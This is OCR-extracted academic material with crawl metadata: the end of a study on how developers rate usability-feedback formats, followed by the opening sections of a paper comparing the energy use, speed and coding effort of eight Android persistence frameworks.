(step 4). Figure 2: Three developers rate the usefulness of the 200 feedback items (step 5). They then work with selected 40 items (step 6) and re-rate them after completing their work (step 7). The developers are finally interviewed about the use of the formats (step 8). Table 1: Average pre and post use rating of question 1-5 organized by feedback format. <table> <thead> <tr> <th>Problem lists (P)</th> <th>GUI binder (G)</th> <th>Multimedia presentation (M)</th> <th>Redesign proposal (R)</th> <th>Human-centered stories (H)</th> <th>F-test</th> <th>Tukey HSD post hoc tests</th> </tr> </thead> <tbody> <tr> <td>Pre use</td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>M, SD</td> <td>M, SD</td> <td>M, SD</td> <td>M, SD</td> <td>M, SD</td> <td></td> <td></td> </tr> <tr> <td>45.3, 12.5</td> <td>54.0, 10.9</td> <td>53.8, 12.1</td> <td>57.0, 11.2</td> <td>31.6, 9.9</td> <td>F(4,170)=28.76, p&lt;.001</td> <td>H&lt;P&lt;MGRR</td> </tr> <tr> <td>Post use</td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>40.5, 14.0</td> <td>42.1, 17.1</td> <td>50.2, 14.6</td> <td>43.5, 12.6</td> <td>32.4, 14.0</td> <td>F(4,30)=1.35, p&gt;.3</td> <td>HPMGR</td> </tr> </tbody> </table> Table 2: Average pre use ratings of formats PGMRH according to question Q1-Q5. The phenomenon where a format is listed in two significant groups (e.g. for G in Q3) means that the format is neither significantly different from one group or the other. <table> <thead> <tr> <th>Problem List (P)</th> <th>GUI binder (G)</th> <th>Multimedia presentation (M)</th> <th>Redesign proposals (R)</th> <th>Human-centered stories (H)</th> <th>F-test</th> <th>Tukey HSD post hoc tests</th> </tr> </thead> <tbody> <tr> <td>M</td> <td>SD</td> <td>M</td> <td>SD</td> <td>M</td> <td>SD</td> <td>M</td> </tr> <tr> <td>Q1: How useful is the feedback item to your work on Jobindex.dk? (not useful/ very useful)</td> <td>58.1</td> <td>13.0</td> <td>61.9</td> <td>11.1</td> <td>60.0</td> <td>9.8</td> </tr> <tr> <td>Q2: How well does the feedback item help you understand the problem? (poorly/very well)</td> <td>59.1</td> <td>16.4</td> <td>67.6</td> <td>11.8</td> <td>69.0</td> <td>14.7</td> </tr> <tr> <td>Q3: How well does the feedback item help you solve the problem? (poorly/very well)</td> <td>28.5</td> <td>12.7</td> <td>45.2</td> <td>15.7</td> <td>43.1</td> <td>17.5</td> </tr> <tr> <td>Q4: How convinced are you that this is a problem? (poorly/very well)</td> <td>44.6</td> <td>15.3</td> <td>50.6</td> <td>14.4</td> <td>54.0</td> <td>13.8</td> </tr> <tr> <td>Q5: How easy is the feedback item to use in your work on Jobindex.dk? (difficult/very easy)</td> <td>36.0</td> <td>15.1</td> <td>44.7</td> <td>14.4</td> <td>43.0</td> <td>15.7</td> </tr> </tbody> </table> Table 3: The feedback formats’ strengths and weaknesses <table> <thead> <tr> <th>Pros</th> <th>Cons</th> </tr> </thead> <tbody> <tr> <td>P</td> <td></td> </tr> <tr> <td>Provides short and sufficient information about simple UPs.</td> <td>Does not describe context of UP.</td> </tr> <tr> <td>Ratings of severity.</td> <td>A bit too short to describe problems fully.</td> </tr> <tr> <td>G</td> <td></td> </tr> <tr> <td>Points to where the UP should be fixed.</td> <td>The problem’s context and triggers need to be elaborated.</td> </tr> <tr> <td>Screendumps are concrete and often easier to understand than text.</td> <td>An illustration of the redesign proposal is lacking.</td> </tr> <tr> <td>M</td> <td></td> </tr> <tr> <td>Video is credible and persuasive.</td> <td>‘Overkill’ to describe simple problems with video.</td> </tr> <tr> <td>Quick and easy to use.</td> <td>Video is too time consuming and it is difficult to get a quick overview of the video</td> </tr> <tr> <td>R</td> <td></td> </tr> <tr> <td>Helps solve the problem well.</td> <td>The problem’s context and triggers are not explained well.</td> </tr> <tr> <td>Illustrations improve quality of redesign proposals.</td> <td>A justification is unnecessary.</td> </tr> <tr> <td>H</td> <td></td> </tr> <tr> <td>Provides information about the context of a UP.</td> <td>‘Overkill’ – it is not a simple way to present a problem. There is a lot of ‘noise’.</td> </tr> <tr> <td>Shows where you ‘loose’ the user in the interaction.</td> <td>Time consuming to read and interpret.</td> </tr> </tbody> </table> Figure 3: It is clear how developers generally rate the 35 UPs lower after having worked with them. The only exception to this trend is H, which in general receives a slightly improved rating. Table 4: The 35 UPs complexity and discoverability clutter in the top left corner suggesting that the UPs used in this study are fairly easy to spot and simple to mend. <table> <thead> <tr> <th></th> <th>Perceivable</th> <th>Actionable</th> <th>Constructable</th> </tr> </thead> <tbody> <tr> <td>Simple</td> <td>11</td> <td>15</td> <td>0</td> </tr> <tr> <td>Middle</td> <td>3</td> <td>4</td> <td>1</td> </tr> <tr> <td>Complex</td> <td>0</td> <td>1</td> <td>0</td> </tr> </tbody> </table>
{"Source-Url": "http://diku.dk/forskning/Publikationer/tekniske_rapporter/2007/07-01.pdf", "len_cl100k_base": 9529, "olmocr-version": "0.1.53", "pdf-total-pages": 36, "total-fallback-pages": 0, "total-input-tokens": 58158, "total-output-tokens": 12468, "length": "2e13", "weborganizer": {"__label__adult": 0.0005154609680175781, "__label__art_design": 0.0013437271118164062, "__label__crime_law": 0.0004627704620361328, "__label__education_jobs": 0.0173797607421875, "__label__entertainment": 0.00010895729064941406, "__label__fashion_beauty": 0.00028514862060546875, "__label__finance_business": 0.00139617919921875, "__label__food_dining": 0.00044417381286621094, "__label__games": 0.0011472702026367188, "__label__hardware": 0.0007638931274414062, "__label__health": 0.0007352828979492188, "__label__history": 0.0004107952117919922, "__label__home_hobbies": 0.0001304149627685547, "__label__industrial": 0.0004487037658691406, "__label__literature": 0.0007419586181640625, "__label__politics": 0.000392913818359375, "__label__religion": 0.0005922317504882812, "__label__science_tech": 0.01380157470703125, "__label__social_life": 0.0001220107078552246, "__label__software": 0.00870513916015625, "__label__software_dev": 0.94873046875, "__label__sports_fitness": 0.000370025634765625, "__label__transportation": 0.0006289482116699219, "__label__travel": 0.00024378299713134768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50821, 0.04003]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50821, 0.28761]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50821, 0.92589]], "google_gemma-3-12b-it_contains_pii": [[0, 172, false], [172, 351, null], [351, 1386, null], [1386, 3184, null], [3184, 4911, null], [4911, 6715, null], [6715, 8545, null], [8545, 10366, null], [10366, 12132, null], [12132, 13990, null], [13990, 15881, null], [15881, 17687, null], [17687, 19406, null], [19406, 21178, null], [21178, 22860, null], [22860, 24778, null], [24778, 26626, null], [26626, 28482, null], [28482, 30266, null], [30266, 32008, null], [32008, 33969, null], [33969, 35805, null], [35805, 37656, null], [37656, 39496, null], [39496, 40652, null], [40652, 41892, null], [41892, 43177, null], [43177, 44316, null], [44316, 44624, null], [44624, 44887, null], [44887, 46074, null], [46074, 47681, null], [47681, 50193, null], [50193, 50386, null], [50386, 50821, null], [50821, 50821, null]], "google_gemma-3-12b-it_is_public_document": [[0, 172, true], [172, 351, null], [351, 1386, null], [1386, 3184, null], [3184, 4911, null], [4911, 6715, null], [6715, 8545, null], [8545, 10366, null], [10366, 12132, null], [12132, 13990, null], [13990, 15881, null], [15881, 17687, null], [17687, 19406, null], [19406, 21178, null], [21178, 22860, null], [22860, 24778, null], [24778, 26626, null], [26626, 28482, null], [28482, 30266, null], [30266, 32008, null], [32008, 33969, null], [33969, 35805, null], [35805, 37656, null], [37656, 39496, null], [39496, 40652, null], [40652, 41892, null], [41892, 43177, null], [43177, 44316, null], [44316, 44624, null], [44624, 44887, null], [44887, 46074, null], [46074, 47681, null], [47681, 50193, null], [50193, 50386, null], [50386, 50821, null], [50821, 50821, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50821, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50821, null]], "pdf_page_numbers": [[0, 172, 1], [172, 351, 2], [351, 1386, 3], [1386, 3184, 4], [3184, 4911, 5], [4911, 6715, 6], [6715, 8545, 7], [8545, 10366, 8], [10366, 12132, 9], [12132, 13990, 10], [13990, 15881, 11], [15881, 17687, 12], [17687, 19406, 13], [19406, 21178, 14], [21178, 22860, 15], [22860, 24778, 16], [24778, 26626, 17], [26626, 28482, 18], [28482, 30266, 19], [30266, 32008, 20], [32008, 33969, 21], [33969, 35805, 22], [35805, 37656, 23], [37656, 39496, 24], [39496, 40652, 25], [40652, 41892, 26], [41892, 43177, 27], [43177, 44316, 28], [44316, 44624, 29], [44624, 44887, 30], [44887, 46074, 31], [46074, 47681, 32], [47681, 50193, 33], [50193, 50386, 34], [50386, 50821, 35], [50821, 50821, 36]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50821, 0.18782]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
42a7f334553f4b59ae3aa9f027cba2f70ad301ce
[REMOVED]
{"Source-Url": "https://www.research.ed.ac.uk/portal/files/12289066/parametric_logic.pdf", "len_cl100k_base": 9816, "olmocr-version": "0.1.50", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 72343, "total-output-tokens": 11695, "length": "2e13", "weborganizer": {"__label__adult": 0.0006456375122070312, "__label__art_design": 0.0005855560302734375, "__label__crime_law": 0.0006937980651855469, "__label__education_jobs": 0.0013294219970703125, "__label__entertainment": 0.00017154216766357422, "__label__fashion_beauty": 0.0003211498260498047, "__label__finance_business": 0.0005788803100585938, "__label__food_dining": 0.0009560585021972656, "__label__games": 0.0012340545654296875, "__label__hardware": 0.0014667510986328125, "__label__health": 0.001868247985839844, "__label__history": 0.0005025863647460938, "__label__home_hobbies": 0.00021076202392578125, "__label__industrial": 0.0011777877807617188, "__label__literature": 0.0010166168212890625, "__label__politics": 0.0006513595581054688, "__label__religion": 0.0010805130004882812, "__label__science_tech": 0.2467041015625, "__label__social_life": 0.0001919269561767578, "__label__software": 0.005306243896484375, "__label__software_dev": 0.73095703125, "__label__sports_fitness": 0.0005359649658203125, "__label__transportation": 0.0014524459838867188, "__label__travel": 0.0003025531768798828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35316, 0.01203]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35316, 0.41649]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35316, 0.7757]], "google_gemma-3-12b-it_contains_pii": [[0, 1319, false], [1319, 3787, null], [3787, 7162, null], [7162, 9929, null], [9929, 11263, null], [11263, 14384, null], [14384, 15536, null], [15536, 15903, null], [15903, 17403, null], [17403, 20503, null], [20503, 23281, null], [23281, 25613, null], [25613, 27920, null], [27920, 30638, null], [30638, 32669, null], [32669, 35316, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1319, true], [1319, 3787, null], [3787, 7162, null], [7162, 9929, null], [9929, 11263, null], [11263, 14384, null], [14384, 15536, null], [15536, 15903, null], [15903, 17403, null], [17403, 20503, null], [20503, 23281, null], [23281, 25613, null], [25613, 27920, null], [27920, 30638, null], [30638, 32669, null], [32669, 35316, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35316, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35316, null]], "pdf_page_numbers": [[0, 1319, 1], [1319, 3787, 2], [3787, 7162, 3], [7162, 9929, 4], [9929, 11263, 5], [11263, 14384, 6], [14384, 15536, 7], [15536, 15903, 8], [15903, 17403, 9], [17403, 20503, 10], [20503, 23281, 11], [23281, 25613, 12], [25613, 27920, 13], [27920, 30638, 14], [30638, 32669, 15], [32669, 35316, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35316, 0.0]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
07d3f6995676b91a0b52e8c393190fddfa8f291f
Performance and programming effort trade-offs of android persistence frameworks Zheng Jason Song*, Jing Pu, Junjie Cheng, Eli Tilevich Software Innovations Lab, Virginia Tech, Blacksburg, VA 24061, United States A R T I C L E I N F O Article history: Received 30 August 2017 Revised 26 June 2018 Accepted 21 August 2018 Available online 23 August 2018 Keywords: Persistence framework Mobile application Performance Programming effort A B S T R A C T A fundamental building block of a mobile application is the ability to persist program data between different invocations. Referred to as persistence, this functionality is commonly implemented by means of persistence frameworks. Without a clear understanding of the energy consumption, execution time, and programming effort of popular Android persistence frameworks, mobile developers lack guidelines for selecting frameworks for their applications. To bridge this knowledge gap, we report on the results of a systematic study of the performance and programming effort trade-offs of eight Android persistence frameworks, and provide practical recommendations for mobile application developers. © 2018 Elsevier Inc. All rights reserved. 1. Introduction Any non-trivial application includes a functionality that preserves and retrieves user data, both during the application session and across sessions; this functionality is commonly referred to as persistence. In persistent applications, relational or non-relational database engines preserve user data, which is operated by programmers either by writing raw database operations, or via data persistence frameworks. By providing abstractions on top of raw database operations, data persistence frameworks help streamline the development process. As mobile devices continue to replace desktops as the primary computing platform, Android is poised to win the mobile platform contest, taking the 82.8% share of the mobile market in 2015 (Smartphone OS market share, 2015) with more than 1.6 million applications developed thus far (Statista, 2015). Energy efficiency remains one of the key considerations when developing mobile applications (Jha, 2011; Kwon and Tilevich, 2013a; Li et al., 2014), as the energy demands of applications continue to exceed the devices’ battery capacity. Consequently, in recent years researchers have focused their efforts on providing Android developers with insights that can be used to improve the energy efficiency of mobile applications. The research literature on the subject includes approaches ranging from general program analysis and modeling (Hao et al., 2013; Tiwari et al., 1996; Dong and Zhong, 2010; Chen et al., 2012) to application-level analysis (Sahin et al., 2012; Hindle, 2012; Kwon and Tilevich, 2013b; Pinto et al., 2014). Despite all the progress made in understanding the energy impact of programming patterns and constructs, a notable omission in the research literature on the topic is the energy consumption of persistence frameworks. Although an indispensable building block of mobile applications, these frameworks have never been systematically studied in this context, which can help programmers gain a comprehensive insight on the overall energy efficiency of modern mobile applications. Furthermore, to be able to make informed decisions when selecting a persistence framework for a mobile application, developers have to be mindful of the energy consumption, execution time, and programming effort trade-offs of major persistence frameworks. To that end, this paper reports on the results of a comprehensive study we have conducted to measure and analyze the energy consumption, execution time, and programming effort trade-offs of popular Android persistence frameworks. For Android applications, persistence frameworks expose their APIs to the application developers as either object-relational mappings (ORM), object-oriented (OO) interfaces, or key-value interfaces, according to the underlying database engine. In this article, we consider the persistence libraries most widely used in Android applications (Mukherjee and Mondal, 2014). In particular, we study six widely used ORM persistence frameworks (ActiveAndroid by par- don, 0000; greenDAO, 0000; Ormlite, 0000; Sugar ORM, 0000; Sqlite database engine, 0000; DBFlow, 0000)), one OO persistence framework (Realm database engine, 0000), and one key-value database operation framework (Paper, 0000) as our experi- mental targets. These frameworks operate on top of the popular SQLite, Realm, or NoSQL database engines. In our experiments, we apply these eight persistence frameworks to different benchmarks, and then compare and contrast the resulting energy consumption, execution time, and programming effort (measured as lines of programmer-written code). Our experiments include a set of micro-benchmarks designed to measure the performance of individual database operations as well as the well-known DaCapo H2 database benchmark (Blackburn et al., 2006). To better understand the noticeable performance and programming effort disparities between persistence frameworks, we also introduce a numerical model that juxtaposes the performance and programming efforts of different persistence frameworks. By applying this model to the benchmarks, we generate several guidelines that can help developers choose the right persistence framework for a given application. In other words, one key contribution of our study is informing Android developers about how they can choose a persistence framework that achieves the desired energy/exolution time/programming effort balance. Depending on the amount of persistence functionality in an application, the choice of a persistence framework may dramatically impact the levels of energy consumption, execution time, and programming effort. By precisely measuring and thoroughly analyzing these characteristics of alternative Android persistence frameworks, this study aims at gaining a deeper understanding of the persistence’s impact on the mobile software development ecosystem. The specific questions we want to answer are: **RQ1.** How do popular Android persistence frameworks differ in terms of their respective features and capabilities? **RQ2.** as it is realize What is the relationship between the persistence framework’s features and capabilities and the resulting execution time, energy efficiency, and programming effort? **RQ3.** How do the characteristics of an application’s database functionality affect the performance of persistence frameworks? **RQ4.** Which metrics should be measured to meaningfully assess the appropriateness of a persistence framework for a given mobile application scenario? To answer RQ1, we analyze the documentation and implementation of the persistence frameworks under study to compare and contrast their features and capabilities. To answer RQ2 and RQ3, we measure each of the energy, execution time, and programming effort metrics separately, compute their correlations, as well as analyze and interpret the results. To answer RQ4, we introduce a numerical model, apply it to the benchmarks used for the measurements, and generate several recommendation guidelines. Based on our experimental results, the main contributions of this article are as follows: 1. To the best of our knowledge, this is the first study that empirically evaluates the energy, execution time, and programming effort trade-offs of popular Android persistence frameworks. 2. Our experiments consider multifaceted combinations of factors which may impact the energy consumption and execution time of persistence functionality in real-world applications, which include persistence operations involved, the volume of persisted data, and the number of transactions. 3. Based on our experimental results, we offer a series of guidelines for Android mobile developers to select the most appropriate persistence framework for their mobile applications. For example, ActiveAndroid or OrmLite fit well for applications processing relatively large data volumes in a read-write fashion. These guidelines can also help the framework developers to optimize their products for the mobile market. 4. We introduce a numerical model that can be applied to evaluate the fitness of a persistence framework for a given application scenario. Our model considers programming effort in addition to execution time and energy efficiency to provide insights relevant to software developers. The rest of this paper is organized as follows. Section 2 summarizes the related prior work. Section 3 provides the background information for this research. Section 4 describes the design of our experimental study. Section 5 presents the study results and interprets our findings. Section 6 presents our numerical model and offers practical guidelines for Android developers. Section 7 discusses the threats to internal and external validity of our experimental results. Section 8 concludes this article. This work extends our previous study of Android persistence frameworks, published in IEEE MASCOTS 2016 (Jing et al., 2016). This article is a revised and extended version of that paper. In particular, we describe the additional research we conducted, which now includes: (1) a comprehensive analysis of the studied frameworks’ features, (2) the measurements and analysis for two additional persistence frameworks, (3) a study of the relationship between database-operations, execution time, and energy consumption, based on our measurements, and (4) a novel empirical model for selecting frameworks for a given set of development requirements. ### 2. Related work This section discusses some prior approaches that have focused on understanding the execution time, energy efficiency, and programming effort factors as well as their interaction in mobile computing. Multiple prior studies have focused on understanding the energy consumption of different mobile apps and system calls, including approaches ranging from system level modeling of general systems (Tiwari et al., 1996) and mobile systems (Dong and Zhong, 2010), to application level analysis (Banerjee et al., 2014) and optimization (Kwon and Tilevich, 2013b). For example, Chowdhury et al. study the energy consumed by logging in Android apps (Chowdhury et al., 2017), as well as the energy consumed by HTTP/2 in mobile apps (Chowdhury et al., 2016). Liu et al. (2016) study the energy consumed by wake locks in popular Android apps. Many of these works make use of the Green Miner testbed (Hindle et al., 2014) to accurately measure the amount of consumed energy. As an alternative, the (Monsoon power monitor, 0000) is also used to measure the energy consumed by various Android APIs (Li et al., 2014; Linares-Vásquez et al., 2014). In our work, we have decided to use the Monsoon power meter, due to the tool’s ease of deployment and operation. Many studies also focus on the impact of software engineering practices on energy consumption. For example, (Sahin et al., 2012) study the relationship between design patterns and software energy consumption. Hindle et al. (2014) provide a methodology for measuring the impact of software changes on energy consumption. Hasan et al. (2016) provide a detailed profile of the energy consumed by common operations performed on the Java List, Map, and Set data structures to guide programmers in selecting the correct library classes for different application scenarios. Pinto et al. (2014) study how programmers treat the issue of energy consumption throughout the software engineering process. The knowledge inferred from the aforementioned studies of energy consumption can be applied to optimize the energy usage of mobile apps, either by guiding the developer (Cohen et al., 2012; Pathak et al., 2012) or via automated optimization (Li et al., 2016). As discovered in Manotas et al. (2016), mobile app developers tend to be better tuned to the issues of energy consumption than developers in other domains, with a large portion of interviewed developers taking the issue of reducing energy consumptions into account during the development process. Local databases are widely used for persisting data in Android apps (Lyu et al., 2017), and the corresponding database operation APIs are known to be as “energy-greedy” (Linares-Vásquez et al., 2014). Several persistence frameworks have been developed with the goal of alleviating the burden of writing SQL queries by hand. However, how these frameworks affect the energy consumption of Android apps has not been yet studied systematically. To bridge this knowledge gap, in this work, we study not only the performance of such frameworks, but also the programming effort they require, with the resulting knowledge base providing practical guidelines for mobile app developers, who need to decide which persistence framework should be used in a given application scenario. 3. Background To set the context for our work, this section describes the persistence functionality, as it is commonly implemented by means of database engines and persistence frameworks. The designers of the Android platform have recognized the importance of persistence by including the SQLite database module with the standard Android image as early as the release 1.5. Ever since this module has been used widely in Android applications. According to our analysis of the most popular 550 applications hosted on Google Play (25 most popular apps for each category, and 22 categories in all), over 400 of them (73%) involve interactions with the SQLite module. The ORM (object-relational mapping) frameworks have been introduced and refined to facilitate the creation of database-oriented applications (Xia et al., 2009; Cvetković and Janković, 2010). The prior studies of the ORM frameworks have focused mainly on their execution efficiency and energy efficiency. Meanwhile, Vetro et al. (2013) show how various software development factors (e.g., design patterns, software architecture, information hiding, implementation of persistence layers, code obfuscation, refactoring, and data structure usage) can significantly influence the performance of a software system. In this article, we compare the performance of different persistence frameworks in a mobile execution environment with the goal of understanding the results from the perspective of mobile app developers. Android persistence frameworks A persistence framework serves as a middleware layer that bridges the application logic with the database engine’s operations. The database engine maintains a schema in memory or on disk, and the framework provides a programming interface for the application to interact with the database engine. As SQLite (the native database of Android) is a relational database engine, most Android persistence frameworks developed for SQLite are ORM/IO frameworks. One major function of such object-relational mapping (ORM) and object-oriented frameworks is to solve the object-relational impedance mismatch (Subramanian et al., 1999) between the object-oriented programming model and the relational database operation model. We evaluate 8 frameworks: Android SQLite, ActiveAndroid, greenDAO, OrmLite, Sugar ORM, DBFlow, Java Realm, and Paper, backed up by the SQLite, Realm, and NoSQL database engines, which are customized for mobile devices, with limited resources, including battery power, memory, and processor. Persistence framework feature comparison Persistence frameworks differ in a variety of ways, including database engines, programming support (e.g., object and schema auto generation), programming abstractions (e.g., data access object (DAO) support, relationships, raw query interfaces, batch operations, complex updates, and aggregation operations), relational features support (e.g., key/index Structure, SQL join operations, etc.), and execution modes (e.g., transactions and caching). We focus on these features, as they may impact energy consumption, execution time, and programming effort. Table 1 compares these similarities and differences of the persistence frameworks used in our study. 1. Database engine Six of the studied persistence frameworks use SQLite (Newman, 2004), an ACID (Atomic, Consistent, Isolated, and Durable) and SQL standard-compliant relational database engine. Java Realm framework uses Realm (Realm database engine, 0000), an object-oriented database engine, whose design goal is to provide functionality equivalent to relational engines. Paper uses NoSQL (0000), a non-relational, schema-free, key-value data storage database. Therefore, as we here mainly compare features of relational database, Paper as a non-relational database engine, lacks many of these features. 2. Object code generation Some frameworks feature code generators, which relieve the developer from having to write by hand the classes that represent the relational schema in place. 3. Schema generation At the initialization stage, persistence frameworks employ different strategies to generate the database schema. Android SQLite requires raw SQL statements to create database tables, while OrmLite provides a special API call. greenDAO generates a special DAO class that includes the schema. The remaining frameworks (excluding Paper) automatically extract the table schema from the programmer defined entity classes. 4. Data access method DAO (Data Access Object) is a well-known abstraction strategy for database access that provides a unified object-oriented, entity-based persistence operation set (insert, update, delete, query, etc.). greenDAO, Sugar ORM, and OrmLite provide the DAO layer, while Android SQLite adopts a relational rather than DAO database manipulating interface. ActiveAndroid, DBFlow, and Java Realm provide a hybrid strategy—both DAO and SQL builder APIs. 5. Relationship support The three relationships between entities are one-to-one, one-to-many, and many-to-many. greenDAO and Java Realm support all three relationships. ActiveAndroid lacks support for Many-to-Many, while Sugar ORM and DBFlow only support One-To-Many. Android SQLite and OrmLite lack support for relationships, requiring the programmer to write explicit SQL join operations. 6. Raw query interface support Raw queries use naive SQL statements, thus deviating from pure object-orientation to execute complex database operations on multiple tables, nesting queries and aggregation functions. Android SQLite, greenDAO, OrmLite, and DBFlow—all provide this functionality. 7. Batch operations Batch operations commit several same-type database changes at once, thus improving performance. greenDAO, OrmLite, Sugar ORM, and DBFlow provide batch mechanisms for insert, update and delete. Java Realm provides batch inserts only, and the remaining two frameworks lack this functionality. 8. Complex update support Typically there are two kinds of database update operations: update columns to given values, or update columns based on arithmetic expressions. Android SQLite and ActiveAndroid can only use raw SQL manipulation interface to support expression updates. greenDAO, Sugar ORM, Java Realm, and DBFlow support complex updates via entity field modification. OrmLite is the only framework that provides both the value update and expression update abstractions. 9. Aggregation support Aggregating data in a relational database enables the statistical analysis over a set of records. Different frameworks selectively implement aggregation functionality. Android SQLite, OrmLite, and DBFlow support all of the aggregation functions via a raw SQL interface. Java Realm and Sugar ORM provide an aggregation subset in the entity layer. ActiveAndroid and greenDAO support only the COUNT aggregation. 10. **Key/index structure** Key/index structure identifies individual records, indicates table correlations, and increases the execution speed. Android SQLite and DBFlow fully support the database constraints—single or multiple primary keys (PK), index and foreign key (FK). ActiveAndroid supports integer single PK, unique, index, and FK. greenDAO supports integer single PK, unique, index. OrmLite supports single PK, index, and FK. Sugar ORM supports integer single PK and unique. Java Realm supports string or integer single PK, and index. 11. **SQL JOIN support** SQL JOIN clause combines data from two or more relational tables. Android SQLite and DBFlow only support raw JOIN SQL. ActiveAndroid incorporates JOIN in its object query interface. DAOs of greenDAO and OrmLite provide the JOIN operation. Sugar ORM and Java Realm lack this support. 12. **Transaction support** Transactions perform a sequence of operations as a single logical execution unit. All the studied engines with the exception of greenDAO, Sugar ORM, and Paper provide full transactional support. 13. **Cache support** OrmLite, ActiveAndroid, greenDAO, DBFlow and Paper support caching. They provide this advanced feature to maintain persisted entities in memory to speed-up future accesses, at the cost of extra processing required to initialize the cache pool. ### 4. Experiment design In this section, we explain the main decisions we have made to design our experiments. In particular, we discuss the benchmarks, the measurement variables, and the experimental parameters. #### 4.1. Benchmark selection DaCapo H2 (Blackburn et al., 2006) is a well-known Java database benchmark that interacts with the H2 Database Engine via JDBC. This benchmark manipulates a considerable volume of data to emulate bank transactions. The benchmark includes (1) a complex schema and non-trivial functionality, obtained from a real-world production environment. The database structure is complex (12 tables, with 120 table columns and 11 relationship between tables), while the database operations simulate the running of heavy-workload database-oriented applications; (2) complex database operations that require: batching, aggregations, and transactions. Since DaCapo relies heavily on relational data structures and operations, we replace H2 with two relational database engines, SQLite or Realm, to adapt this benchmark for Android. In other words, we evaluate the performance of all persistence frameworks under the DaCapo benchmark except for Paper, which is a non-relational database engine. However, using the DaCapo benchmark alone cannot provide performance evaluation of persistence frameworks under the low data volumes with simple schema conditions. To establish a baseline for our evaluation, we thus designed a set of micro benchmarks, referred to as the Android ORM Benchmark, which features a simple database schema with few data records. Specifically, this benchmark’s database structure includes 2 tables comprising 11 table columns, and a varying small number of data records. Besides, this micro-benchmark comprises the fundamental database operation invocations “create table”, “insert”, “delete”, “select”, and “update”. As the database operations in many mobile applications tend to be rather simple, the micro-benchmark’s results present valuable insights for application developers. Note that database operations differ from database operation invocations. The invocations refer to calling the interfaces provided by the persistence framework (e.g., “insert”, “select”, “update” and “delete”). However, each invocation can result in multiple database operations (e.g., `android...SQLiteDatabase.executeInsert()`). 4.2. Test suite implementation Our experimental setup comprises a mobile app that uses the selected benchmarked frameworks to execute both DaCapo and the Android ORM Benchmark. Through this app, experimenters can select benchmarks, parameterize the operation and data volume, as well as select ORM frameworks. The implementation of the test suite was directed by two graduate students, each of whom has more than three years of experience in developing commercial database-driven projects. As stated above, the DaCapo database benchmark is designed for relational databases, so it would be non-trivial to reimplement it using Paper, which is based on a non-relational database engine (NoSQL). Therefore, the DaCapo benchmark is only applied to seven persistence frameworks, while the Android ORM Benchmark is applied to all eight persistence frameworks. For each benchmark, the transaction logic (e.g., creating bank accounts for DaCapo) is implemented using various ORM frameworks, following the design guidelines of these frameworks. For example, greenDAO, Sugar ORM, and OrmLite provide object-oriented data access methods, so their benchmarks’ data operations are implemented by using DAO. On the contrary, Android SQLite adopts a relational rather than DAO database manipulating interface, so its benchmark’s data operations are implemented by using SQL builders. ActiveAndroid, DBFlow, and Java Realm provide a hybrid strategy—both DAO and SQL builder APIs. For these frameworks, if the benchmark’s operation is impossible or non-trivial to express using DAO, the SQL builder API is used instead. 4.3. Parameters and variables Next, we explain the variables used to evaluate the execution time, energy consumption, and programming effort of the studied persistence frameworks. We also describe how these variables are obtained. - **Overall execution time** The overall execution time is the time elapsed from the point when a database transaction is triggered to the point when it completes. - **Read/write database operation number** We focus on comparing the Read/Write numbers only for SQLite-based frameworks (ActiveAndroid, greenDAO, OrmLite, Sugar ORM, and DBFlow), as such frameworks use SQLite operation interfaces provided by the Android framework to operate on SQLite database. The write operations include executing SQL statements that are used to “insert”, “delete”, and “update”, while the read operations include only “select”. When performing the same combination of transactions, the differences in Read/Write number is the output of how different persistence frameworks interpret database operation invocations. The read/write ratio can also impact the 